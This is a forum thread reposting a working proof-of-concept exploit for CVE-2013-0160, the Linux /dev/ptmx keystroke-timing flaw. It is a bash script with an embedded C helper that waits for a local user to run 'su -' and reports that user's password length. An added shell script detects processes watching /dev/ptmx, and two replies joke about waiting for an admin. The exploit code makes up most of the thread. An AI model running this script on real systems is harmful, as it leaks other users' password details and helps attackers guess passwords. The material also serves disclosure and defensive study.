Nytro Posted February 5, 2013

[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h]

[code]
#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determines the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

# Refuse to start while an "su" process already exists: the loop below
# keys on the number of matching processes going from 1 to 2.
if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" sessions before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

# Small C helper: counts inotify IN_MODIFY events on /dev/ptmx (one per
# keystroke on the affected kernels) until it receives SIGINT.
cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result(int sig) {
  (void)sig;
  /* count-1: the final Enter is not part of the password */
  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {
  int fd;
  char buf[1024];

  signal(SIGINT, display_result);

  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

  while(read(fd, buf, 1024))
    count++;

  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo "[*] Wait for someone to run \"su -\""

# One "su" process: the password prompt is up, start counting.
# Two "su" processes: authentication succeeded, stop and report.
while true; do
  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})
  case ${x% *} in
    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp};
       ${exe} &
       (( run = 1 ))
       ;;
    2) [ ! -z "$!" ] && kill -2 $!;
       break
       ;;
  esac
done

rm -f ${exe}{,.c} ${tmp}
[/code]

Source: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
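Added defender-side example, not part of the original post or of vladz's PoC: a POSIX shell check that looks for processes holding an inotify watch on /dev/ptmx, which is the footprint the script above leaves while it waits for an "su". It assumes a Linux /proc that lists inotify watches in /proc/<pid>/fdinfo/<fd> (lines of the form "inotify wd:N ino:<hex> sdev:<hex> mask:<hex> ...") and GNU stat; fdinfo_watches_inode and scan_ptmx_watchers are names chosen here.

```shell
#!/bin/sh
# Constructed example: detect inotify watches on /dev/ptmx.
# Assumption: the kernel exposes inotify watches in /proc/<pid>/fdinfo
# (one "inotify wd:... ino:<hex> ..." line per watched inode).

# fdinfo_watches_inode FDINFO_TEXT INODE_DECIMAL
# Returns 0 when the fdinfo text holds a watch on the given inode.
fdinfo_watches_inode() {
  want=$2
  for ino_hex in $(printf '%s\n' "$1" |
      sed -n 's/^inotify wd:[0-9]* ino:\([0-9a-f]*\) .*/\1/p'); do
    # "ino:" is printed in hex; stat -c %i gives decimal
    [ "$(printf '%d' "0x$ino_hex")" -eq "$want" ] && return 0
  done
  return 1
}

# scan_ptmx_watchers: print "pid (comm) fd" for every inotify descriptor
# that watches /dev/ptmx. Only processes readable by the caller are seen
# (all of them when run as root). Returns 0 if at least one was found.
scan_ptmx_watchers() {
  want=$(stat -c %i /dev/ptmx 2>/dev/null) || return 1
  found=1
  for f in /proc/[0-9]*/fdinfo/*; do
    text=$(cat "$f" 2>/dev/null) || continue
    case "$text" in *"inotify wd:"*) ;; *) continue ;; esac
    if fdinfo_watches_inode "$text" "$want"; then
      pid=${f#/proc/}; pid=${pid%%/*}
      printf '[!] pid %s (%s) fd %s watches /dev/ptmx\n' \
        "$pid" "$(cat /proc/"$pid"/comm 2>/dev/null)" "${f##*/}"
      found=0
    fi
  done
  return $found
}

# Stand-alone use: scan the live system when /dev/ptmx exists.
if [ -c /dev/ptmx ]; then
  scan_ptmx_watchers || echo "[*] no inotify watch on /dev/ptmx found"
fi
```

On kernels that carry the fix for CVE-2013-0160 the ptmx timestamps are no longer updated, so such a watch never fires; a process holding one is still worth a look.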
backdoor Posted February 6, 2013

Nice, I'm curious how many hours you have to stay logged in before an admin comes along and runs "su". And what if they log in directly as root? I'll test it on other OSes too when I have a bit of time.
boogy Posted February 6, 2013

If they log in directly as root, that means they're not a good admin.